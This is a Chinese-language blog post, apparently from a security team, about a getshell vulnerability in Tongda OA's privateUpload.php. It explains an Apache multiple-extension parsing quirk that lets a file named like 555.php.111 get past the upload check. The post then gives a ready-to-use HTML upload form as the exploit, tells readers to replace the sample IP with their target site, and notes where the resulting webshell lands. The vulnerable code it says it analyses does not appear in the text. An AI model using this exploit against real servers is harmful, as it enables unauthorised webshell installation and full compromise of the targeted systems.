通达OA getshell漏洞分析附EXP

作者:西毒@SafeKey Team

 

在general/vmeet/ 下的 privateUpload.php文件
我们看看代码

 

 

 

这是对上面代码的一个解析,看看我们怎么绕过这个过程拿下webshell呢?
首先我们必须得明白….这里系统采用的是apache服务器,apache服务器存在一个解析漏洞,即 当遇到这样的文件(1.php.222) 他会解析这个文件为php
我们这里就是利用这个漏洞绕过上面的检测后缀名的。

所以我们只要上传非php后缀的文件,然后我们自定义一个后缀为1.php.111这样就行了。 上传目录又告诉我们了,所以我们就这样可以轻松获取一个webshell了


下面我附一下利用exp
保存下面的代码为1.html 如果需要测试的话,只需要将192.168.56.139改成你的目标站点
exp 放在这里

 

 

<form id=”frmUpload” enctype=”multipart/form-data”
action=”http://192.168.56.139/general/vmeet/privateUpload.php?fileName=555.php.111″ method=”post”>Upload a new file:<br>
<input type=”file” name=”Filedata” size=”50″><br>
<input type=”submit” value=”Upload”>
<!– http://192.168.56.139/general/vmeet/upload/temp/555.php.111 这里是上传之后的网马–>
</form>

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录